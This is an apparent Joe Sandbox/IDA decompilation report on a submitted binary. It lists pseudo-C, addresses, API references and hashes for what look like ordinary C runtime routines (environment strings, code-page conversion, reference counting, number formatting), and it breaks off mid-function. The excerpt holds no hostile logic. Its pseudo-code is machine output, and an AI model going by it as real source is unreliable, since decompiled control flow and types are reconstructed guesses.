MultiByteToWideChar.KERNEL32(01D31728,00000009,01D31728,?,00000000,00000000), ref: 00410A87

Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782

MultiByteToWideChar.KERNEL32(01D31728,00000001,01D31728,?,00000000,00000000), ref: 00410AE6
CompareStringW.KERNEL32 ref: 00410AFA

Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2

CompareStringA.KERNEL32 ref: 00410BB4

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
Part of subcall function 004134F7: _strlen.LIBCMT ref: 00413577
Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ByteCharMultiWide$Info$CompareString$ErrorExceptionFilterHeapLastProcessUnhandled$AllocCurrentDebuggerFreeLocalePresentTerminate_strlen
String ID:
API String ID: 3425806904-0
Opcode ID: 2d56152bed8c4dde0717e7715c16880031ff5ad7f916456f779a67c982e138e1
Instruction ID: 7711d9c21cebea5d5858b18d19238fb1847bf70f07deecd0d53e6b420bb80e20
Opcode Fuzzy Hash: 2d56152bed8c4dde0717e7715c16880031ff5ad7f916456f779a67c982e138e1
Instruction Fuzzy Hash: DEB1E571A042099FEF219FA4CC51BEF7BB5EF44354F24412BF811A6291D7B898D1CB98

Function 0040F493, Relevance: 13.6, APIs: 9, Instructions: 132

C-Code - Quality: 98%

			E0040F493() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				long _t29;
				int _t30;
				void* _t35;
				WCHAR* _t37;
				CHAR* _t38;
				intOrPtr _t39;
				int _t41;

				_t7 =  *0x436640; // 0x1
				_t30 = 0;
				_t37 = 0;
				_t39 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(_t7 != 1) {
						__eflags = _t7 - _t39;
						if(_t7 == _t39) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t38 = _t8;
							__eflags = _t38 - _t30;
							if(_t38 == _t30) {
								L9:
								return 0;
							}
							__eflags =  *_t38 - _t30;
							if( *_t38 == _t30) {
								L25:
								_t40 = _t8 - _t38 + 1;
								_t35 = E00411099(_t8 - _t38 + 1);
								__eflags = _t35 - _t30;
								if(_t35 != _t30) {
									E004125F0(_t30, _t35, _t38, _t35, _t38, _t40);
									FreeEnvironmentStringsA(_t38);
									return _t35;
								}
								FreeEnvironmentStringsA(_t38);
								goto L9;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t30;
								} while ( *_t8 != _t30);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t30;
							} while ( *_t8 != _t30);
							goto L25;
						}
						__eflags = _t7 - _t30;
						if(_t7 != _t30) {
							goto L9;
						}
						goto L21;
					}
					L7:
					if(_t37 != _t30) {
						L10:
						__eflags =  *_t37 - _t30;
						_t17 = _t37;
						if( *_t37 == _t30) {
							L13:
							_t20 = (_t17 - _t37 >> 1) + 1;
							_v4 = _t20;
							_t41 = WideCharToMultiByte(_t30, _t30, _t37, _t20, _t30, _t30, _t30, _t30);
							__eflags = _t41 - _t30;
							if(_t41 != _t30) {
								_t24 = E00411099(_t41);
								__eflags = _t24 - _t30;
								_v8 = _t24;
								if(_t24 != _t30) {
									__eflags = WideCharToMultiByte(_t30, _t30, _t37, _v4, _t24, _t41, _t30, _t30);
									if(__eflags == 0) {
										_push(_v8);
										E00410D1A(_t30, WideCharToMultiByte, _t37, __eflags);
										_v8 = _t30;
									}
									_t30 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t37);
							return _t30;
						} else {
							goto L11;
						}
						do {
							do {
								L11:
								_t17 = _t17 + _t39;
								__eflags =  *_t17 - _t30;
							} while ( *_t17 != _t30);
							_t17 = _t17 + _t39;
							__eflags =  *_t17 - _t30;
						} while ( *_t17 != _t30);
						goto L13;
					}
					_t37 = GetEnvironmentStringsW();
					if(_t37 != _t30) {
						goto L10;
					}
					goto L9;
				}
				_t37 = GetEnvironmentStringsW();
				if(_t37 == 0) {
					_t29 = GetLastError();
					__eflags = _t29 - 0x78;
					if(_t29 != 0x78) {
						_t7 =  *0x436640; // 0x1
					} else {
						_t7 = _t39;
						 *0x436640 = _t7;
					}
					goto L6;
				} else {
					 *0x436640 = 1;
					goto L7;
				}
			}

0x0040f495
0x0040f4a4
0x0040f4a6
0x0040f4ac
0x0040f4ad
0x0040f4dc
0x0040f4dc
0x0040f4df
0x0040f569
0x0040f56b
0x0040f571
0x0040f571
0x0040f577
0x0040f579
0x0040f57b
0x0040f4f1
0x00000000
0x0040f4f1
0x0040f581
0x0040f583
0x0040f58f
0x0040f592
0x0040f59a
0x0040f59c
0x0040f59f
0x0040f5b0
0x0040f5b9
0x00000000
0x0040f5bf
0x0040f5a2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f585
0x0040f585
0x0040f585
0x0040f585
0x0040f586
0x0040f586
0x0040f58a
0x0040f58b
0x0040f58b
0x00000000
0x0040f585
0x0040f56d
0x0040f56f
0x00000000
0x00000000
0x00000000
0x0040f56f
0x0040f4e5
0x0040f4e7
0x0040f4f8
0x0040f4f8
0x0040f4fb
0x0040f4fd
0x0040f50d
0x0040f51b
0x0040f520
0x0040f526
0x0040f528
0x0040f52a
0x0040f52d
0x0040f532
0x0040f535
0x0040f539
0x0040f548
0x0040f54a
0x0040f54c
0x0040f550
0x0040f556
0x0040f556
0x0040f55a
0x0040f55a
0x0040f539
0x0040f55f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f4ff
0x0040f4ff
0x0040f4ff
0x0040f4ff
0x0040f501
0x0040f501
0x0040f506
0x0040f508
0x0040f508
0x00000000
0x0040f4ff
0x0040f4eb
0x0040f4ef
0x00000000
0x00000000
0x00000000
0x0040f4ef
0x0040f4b1
0x0040f4b5
0x0040f4c3
0x0040f4c9
0x0040f4cc
0x0040f4d7
0x0040f4ce
0x0040f4ce
0x0040f4d0
0x0040f4d0
0x00000000
0x0040f4b7
0x0040f4b7
0x00000000
0x0040f4b7

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4AF
GetLastError.KERNEL32(?,00000001,?,?,0040C94F), ref: 0040F4C3
GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4E9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000001,?,?,0040C94F), ref: 0040F524
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000001,?,?,0040C94F), ref: 0040F546

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

FreeEnvironmentStringsW.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F55F
GetEnvironmentStrings.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F571

Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6

FreeEnvironmentStringsA.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F5A2
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5B9

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide$HeapSleep
String ID:
API String ID: 38382023-0
Opcode ID: 03fe7a4f2fd2452b004d2493e1ba392a754789a28793f81e4d1cb6452a711f60
Instruction ID: 6bf94f53e6792b39615ea347a74f884125bffed823015082882c4e2888071e4e
Opcode Fuzzy Hash: 03fe7a4f2fd2452b004d2493e1ba392a754789a28793f81e4d1cb6452a711f60
Instruction Fuzzy Hash: 803116B25042257FC7303F745C8483B7AECEB58354725093BFA45E3B82E6395C8D86A9

Function 004134F7, Relevance: 12.2, APIs: 8, Instructions: 174

C-Code - Quality: 94%

			E004134F7(void* __edx, int _a4, int _a8, char* _a12, intOrPtr* _a16, char* _a20, int _a24) {
				signed int _v8;
				struct _cpinfo _v28;
				int _v32;
				int _v36;
				int _v40;
				char* _v44;
				int _v48;
				int* _v52;
				char* _v56;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t54;
				intOrPtr* _t57;
				int _t59;
				int _t60;
				int _t62;
				char* _t68;
				int _t69;
				int _t74;
				char* _t79;
				void* _t91;
				int _t93;
				signed int _t96;
				int _t97;
				int _t107;

				_t91 = __edx;
				_t54 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t54 ^ _t96;
				_v44 = _a12;
				_t57 = _a16;
				_v52 = _t57;
				_v40 =  *_t57;
				_t59 = _a4;
				_v56 = _a20;
				_v36 = 0;
				_v48 = 0;
				if(_t59 == _a8) {
					L33:
					_t60 = _v36;
					L34:
					return E0040FE9A(_t60, _t79, _v8 ^ _t96, _t91, 0, _t93);
				}
				_t62 = GetCPInfo(_t59,  &_v28);
				_t79 = MultiByteToWideChar;
				if(_t62 == 0 || _v28 != 1 || GetCPInfo(_a8,  &_v28) == 0 || _v28 != 1) {
					_t93 = MultiByteToWideChar(_a4, 1, _v44, _v40, 0, 0);
					__eflags = _t93;
					if(_t93 != 0) {
						goto L8;
					}
					goto L14;
				} else {
					_t93 = _v40;
					_v48 = 1;
					if(_t93 == 0xffffffff) {
						_t93 = E0040CCD0(_v44) + 1;
					}
					_t107 = _t93;
					L8:
					if(_t107 <= 0 || _t93 > 0x7ffffff0) {
						_v32 = 0;
						goto L20;
					} else {
						_t22 = _t93 + 8; // 0x413126
						_t73 = _t93 + _t22;
						if(_t93 + _t22 > 0x400) {
							_t74 = E0040C70A(_t79, _t91, 0, _t93, _t73);
							__eflags = _t74;
							if(_t74 == 0) {
								L18:
								_v32 = _t74;
								L20:
								if(_v32 == 0) {
									L14:
									_t60 = 0;
									goto L34;
								}
								E0040FE20(0, _v32, 0, _t93 + _t93);
								if(MultiByteToWideChar(_a4, 1, _v44, _v40, _v32, _t93) == 0) {
									L32:
									E0041083E(_v32);
									goto L33;
								}
								_t79 = _v56;
								if(_t79 == 0) {
									__eflags = _v48;
									_t79 = WideCharToMultiByte;
									if(_v48 != 0) {
										L27:
										_t68 = E004110D9(1, _t93);
										__eflags = _t68;
										_v36 = _t68;
										if(_t68 != 0) {
											_t69 = WideCharToMultiByte(_a8, 0, _v32, _t93, _t68, _t93, 0, 0);
											__eflags = _t69;
											if(__eflags != 0) {
												__eflags = _v40 - 0xffffffff;
												if(_v40 != 0xffffffff) {
													 *_v52 = _t69;
												}
											} else {
												_push(_v36);
												E00410D1A(_t79, 0, _t93, __eflags);
												_v36 = 0;
											}
										}
										goto L32;
									}
									_t93 = WideCharToMultiByte(_a8, 0, _v32, _t93, 0, 0, 0, 0);
									__eflags = _t93;
									if(_t93 == 0) {
										goto L32;
									}
									goto L27;
								}
								if(WideCharToMultiByte(_a8, 0, _v32, _t93, _t79, _a24, 0, 0) != 0) {
									_v36 = _t79;
								}
								goto L32;
							}
							 *_t74 = 0xdddd;
							L17:
							_t74 = _t74 + 8;
							goto L18;
						}
						E004136B0(_t73);
						_t74 = _t97;
						if(_t74 == 0) {
							goto L18;
						}
						 *_t74 = 0xcccc;
						goto L17;
					}
				}
			}

0x004134f7
0x004134fd
0x00413504
0x0041350d
0x00413510
0x00413514
0x0041351a
0x0041351d
0x00413526
0x00413529
0x0041352c
0x0041352f
0x00413694
0x00413694
0x00413697
0x004136a8
0x004136a8
0x00413540
0x00413544
0x0041354a
0x004135b9
0x004135bb
0x004135bd
0x00000000
0x00000000
0x00000000
0x00413565
0x00413565
0x0041356b
0x00413572
0x0041357f
0x0041357f
0x00413580
0x00413582
0x00413582
0x004135df
0x00000000
0x0041358c
0x0041358c
0x0041358c
0x00413595
0x004135c7
0x004135cc
0x004135cf
0x004135da
0x004135da
0x004135e2
0x004135e5
0x004135bf
0x004135bf
0x00000000
0x004135bf
0x004135ef
0x0041360a
0x0041368b
0x0041368e
0x00000000
0x00413693
0x0041360c
0x00413611
0x00413630
0x00413633
0x00413639
0x0041364f
0x00413652
0x00413657
0x0041365b
0x0041365e
0x0041366c
0x0041366e
0x00413670
0x00413680
0x00413684
0x00413689
0x00413689
0x00413672
0x00413672
0x00413675
0x0041367b
0x0041367b
0x00413670
0x00000000
0x0041365e
0x00413649
0x0041364b
0x0041364d
0x00000000
0x00000000
0x00000000
0x0041364d
0x00413629
0x0041362b
0x0041362b
0x00000000
0x00413629
0x004135d1
0x004135d7
0x004135d7
0x00000000
0x004135d7
0x00413597
0x0041359c
0x004135a0
0x00000000
0x00000000
0x004135a2
0x00000000
0x004135a2
0x00413582

APIs

GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
_strlen.LIBCMT ref: 00413577
MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7

Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782

MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647

Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE

WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ByteCharMultiWide$ExceptionFilterHeapInfoProcessUnhandled$AllocCurrentDebuggerErrorFreeLastPresentSleepTerminate_strlen
String ID:
API String ID: 39159627-0
Opcode ID: 9172eab0718f799f2318d6833266146a2621448cc8ac9bd4536fe52e53d60e9d
Instruction ID: 1ecd90587a3fbcf07871c9e8a2363682220bc223f27ba50f4d36a1a1f5e24ce7
Opcode Fuzzy Hash: 9172eab0718f799f2318d6833266146a2621448cc8ac9bd4536fe52e53d60e9d
Instruction Fuzzy Hash: 4C516C31900219BECF219F96CC449EFBFBAEF88755F10412AE514A2250D7399A81CB68

Function 004106FE, Relevance: 12.1, APIs: 8, Instructions: 60

C-Code - Quality: 100%

			E004106FE() {
				LONG* _t13;
				LONG* _t14;
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				LONG* _t18;
				LONG** _t29;
				LONG* _t34;
				void* _t36;
				void* _t38;

				_t34 =  *(_t38 + 8);
				if(_t34 == 0) {
					L18:
					return _t34;
				}
				InterlockedDecrement(_t34);
				_t2 =  &(_t34[0x2c]); // 0xffffffd4
				_t13 =  *_t2;
				if(_t13 != 0) {
					InterlockedDecrement(_t13);
				}
				_t3 =  &(_t34[0x2e]); // 0xfffffffe
				_t14 =  *_t3;
				if(_t14 != 0) {
					InterlockedDecrement(_t14);
				}
				_t4 =  &(_t34[0x2d]); // 0x0
				_t15 =  *_t4;
				if(_t15 != 0) {
					InterlockedDecrement(_t15);
				}
				_t5 =  &(_t34[0x30]); // 0x40d436
				_t16 =  *_t5;
				if(_t16 != 0) {
					InterlockedDecrement(_t16);
				}
				_t6 =  &(_t34[0x14]); // 0x418c20
				_t29 = _t6;
				_t36 = 6;
				do {
					if( *((intOrPtr*)(_t29 - 8)) != 0x42c9d0) {
						_t17 =  *_t29;
						if(_t17 != 0) {
							InterlockedDecrement(_t17);
						}
					}
					if( *((intOrPtr*)(_t29 - 4)) != 0) {
						_t9 =  &(_t29[1]); // 0x40c9f9
						_t18 =  *_t9;
						if(_t18 != 0) {
							InterlockedDecrement(_t18);
						}
					}
					_t29 =  &(_t29[4]);
					_t36 = _t36 - 1;
				} while (_t36 != 0);
				_t10 =  &(_t34[0x35]); // 0x0
				InterlockedDecrement( *_t10 + 0xb4);
				goto L18;
			}

0x004106ff
0x00410705
0x00410786
0x00410789
0x00410789
0x00410711
0x00410713
0x00410713
0x0041071b
0x0041071e
0x0041071e
0x00410720
0x00410720
0x00410728
0x0041072b
0x0041072b
0x0041072d
0x0041072d
0x00410735
0x00410738
0x00410738
0x0041073a
0x0041073a
0x00410742
0x00410745
0x00410745
0x00410749
0x00410749
0x0041074c
0x0041074d
0x00410754
0x00410756
0x0041075a
0x0041075d
0x0041075d
0x0041075a
0x00410763
0x00410765
0x00410765
0x0041076a
0x0041076d
0x0041076d
0x0041076a
0x0041076f
0x00410772
0x00410772
0x00410775
0x00410781
0x00000000

APIs

InterlockedDecrement.KERNEL32(00418BD0), ref: 00410711
InterlockedDecrement.KERNEL32(FFFFFFD4), ref: 0041071E
InterlockedDecrement.KERNEL32(FFFFFFFE), ref: 0041072B
InterlockedDecrement.KERNEL32(00000000), ref: 00410738
InterlockedDecrement.KERNEL32(Function_0000D436), ref: 00410745
InterlockedDecrement.KERNEL32(Function_0000D436), ref: 0041075D
InterlockedDecrement.KERNEL32(0040C9F9), ref: 0041076D
InterlockedDecrement.KERNEL32(-000000B4), ref: 00410781

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: DecrementInterlocked
String ID:
API String ID: 3448037634-0
Opcode ID: c309e9319e6b4badbc4ebdbb08fca9c69156c54253e9810b2ea060dee84c474f
Instruction ID: 028784eb5457a0257e02225f07bb79784b4a274754f8e19908869395e5048ee4
Opcode Fuzzy Hash: c309e9319e6b4badbc4ebdbb08fca9c69156c54253e9810b2ea060dee84c474f
Instruction Fuzzy Hash: 6C01097170070497DB20AA69DC84BABB3DDAF40740F09481AE569D7290C7B8F8C0CE65

Function 00410678, Relevance: 12.1, APIs: 8, Instructions: 57

C-Code - Quality: 100%

			E00410678() {
				LONG* _t12;
				LONG* _t13;
				LONG* _t14;
				LONG* _t15;
				LONG* _t16;
				LONG* _t17;
				long* _t27;
				LONG* _t29;
				void* _t30;
				void* _t31;

				_t29 =  *(_t31 + 0x10);
				InterlockedIncrement(_t29);
				_t12 = _t29[0x2c];
				if(_t12 != 0) {
					InterlockedIncrement(_t12);
				}
				_t13 = _t29[0x2e];
				if(_t13 != 0) {
					InterlockedIncrement(_t13);
				}
				_t14 = _t29[0x2d];
				if(_t14 != 0) {
					InterlockedIncrement(_t14);
				}
				_t15 = _t29[0x30];
				if(_t15 != 0) {
					InterlockedIncrement(_t15);
				}
				_t27 =  &(_t29[0x14]);
				_t30 = 6;
				do {
					if( *((intOrPtr*)(_t27 - 8)) != 0x42c9d0) {
						_t16 =  *_t27;
						if(_t16 != 0) {
							InterlockedIncrement(_t16);
						}
					}
					if( *((intOrPtr*)(_t27 - 4)) != 0) {
						_t17 = _t27[1];
						if(_t17 != 0) {
							InterlockedIncrement(_t17);
						}
					}
					_t27 =  &(_t27[4]);
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				return InterlockedIncrement(_t29[0x35] + 0xb4);
			}

0x0041067b
0x00410687
0x00410689
0x00410691
0x00410694
0x00410694
0x00410696
0x0041069e
0x004106a1
0x004106a1
0x004106a3
0x004106ab
0x004106ae
0x004106ae
0x004106b0
0x004106b8
0x004106bb
0x004106bb
0x004106bf
0x004106c2
0x004106c3
0x004106ca
0x004106cc
0x004106d0
0x004106d3
0x004106d3
0x004106d0
0x004106d9
0x004106db
0x004106e0
0x004106e3
0x004106e3
0x004106e0
0x004106e5
0x004106e8
0x004106e8
0x004106fd

APIs

InterlockedIncrement.KERNEL32(?), ref: 00410687
InterlockedIncrement.KERNEL32(?), ref: 00410694
InterlockedIncrement.KERNEL32(?), ref: 004106A1
InterlockedIncrement.KERNEL32(?), ref: 004106AE
InterlockedIncrement.KERNEL32(?), ref: 004106BB
InterlockedIncrement.KERNEL32(?), ref: 004106D3
InterlockedIncrement.KERNEL32(00000000), ref: 004106E3
InterlockedIncrement.KERNEL32(?), ref: 004106F7

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: IncrementInterlocked
String ID:
API String ID: 3508698243-0
Opcode ID: 584b5d64936ea70bd28ca7ffe56d6955d16a170757f0f3b430a4e9ab05ba8e87
Instruction ID: 830e34ad8cf14a22a2fda40cda4a16f8d124ab60a671defd66db59c947213d31
Opcode Fuzzy Hash: 584b5d64936ea70bd28ca7ffe56d6955d16a170757f0f3b430a4e9ab05ba8e87
Instruction Fuzzy Hash: 0B010C7170170897DB20EA7ADD88FABB3DCAF80354F09485AF544D7250DBB8E890CA69

Function 0040DA76, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 336

C-Code - Quality: 35%

			E0040DA76(void* __ebx, void* __edx, signed int* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				short _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* __edi;
				intOrPtr* _t93;
				signed int _t100;
				signed int _t101;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t116;
				signed int _t118;
				signed int _t121;
				signed int _t122;
				intOrPtr _t123;
				void* _t131;
				char* _t132;
				signed int _t137;
				signed int _t142;
				signed int _t148;
				void* _t149;
				signed int _t151;
				void* _t154;
				char* _t158;
				signed int _t172;
				char _t176;
				char _t177;
				unsigned int _t180;
				signed int _t185;
				void* _t191;
				signed int _t194;
				signed int _t195;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr _t206;
				char* _t207;
				char* _t208;
				signed int _t209;
				signed int _t210;
				char* _t211;
				signed int _t212;

				_t191 = __edx;
				_t149 = __ebx;
				_v24 = 0x3ff;
				_v8 = 0x30;
				E0040CB46( &_v40, 0, _a24);
				if(_a16 < 0) {
					_a16 = 0;
				}
				_t205 = _a8;
				_t220 = _t205;
				if(_t205 != 0) {
					__eflags = _a12;
					if(__eflags <= 0) {
						goto L3;
					}
					__eflags = _a12 - _a16 + 0xb;
					 *_t205 = 0;
					if(__eflags > 0) {
						_t203 = _a4;
						_v16 =  *_t203;
						_t100 = _t203[1];
						_push(_t149);
						_t162 = _t100 >> 0x00000014 & 0x000007ff;
						__eflags = (_t100 >> 0x00000014 & 0x000007ff) - 0x7ff;
						if((_t100 >> 0x00000014 & 0x000007ff) != 0x7ff) {
							L22:
							_t101 = _t100 & 0x80000000;
							__eflags = _t101;
							if(_t101 != 0) {
								 *_t205 = 0x2d;
								_t205 = _t205 + 1;
								__eflags = _t205;
							}
							_t151 = _a20;
							 *_t205 = 0x30;
							_t207 = _t205 + 1;
							__eflags = _t151;
							 *_t207 = ((_t101 & 0xffffff00 | _t151 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
							_t208 = _t207 + 1;
							asm("sbb ebx, ebx");
							_t154 = ( ~_t151 & 0xffffffe0) + 0x27;
							__eflags = _t203[1] & 0x7ff00000;
							if((_t203[1] & 0x7ff00000) != 0) {
								 *_t208 = 0x31;
								_t209 = _t208 + 1;
								__eflags = _t209;
							} else {
								 *_t208 = 0x30;
								_t209 = _t208 + 1;
								__eflags =  *_t203 | _t203[1] & 0x000fffff;
								if(( *_t203 | _t203[1] & 0x000fffff) != 0) {
									_v24 = 0x3fe;
								} else {
									_v24 = 0;
								}
							}
							_t108 = _t209;
							_t210 = _t209 + 1;
							__eflags = _a16;
							_a8 = _t108;
							if(_a16 != 0) {
								 *_t108 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v40 + 0xbc))))));
							} else {
								 *_t108 = 0;
							}
							_t109 =  *_t203;
							_t172 = _t203[1] & 0x000fffff;
							__eflags = _t172;
							_v12 = _t172;
							if(_t172 > 0) {
								L34:
								_v16 = 0;
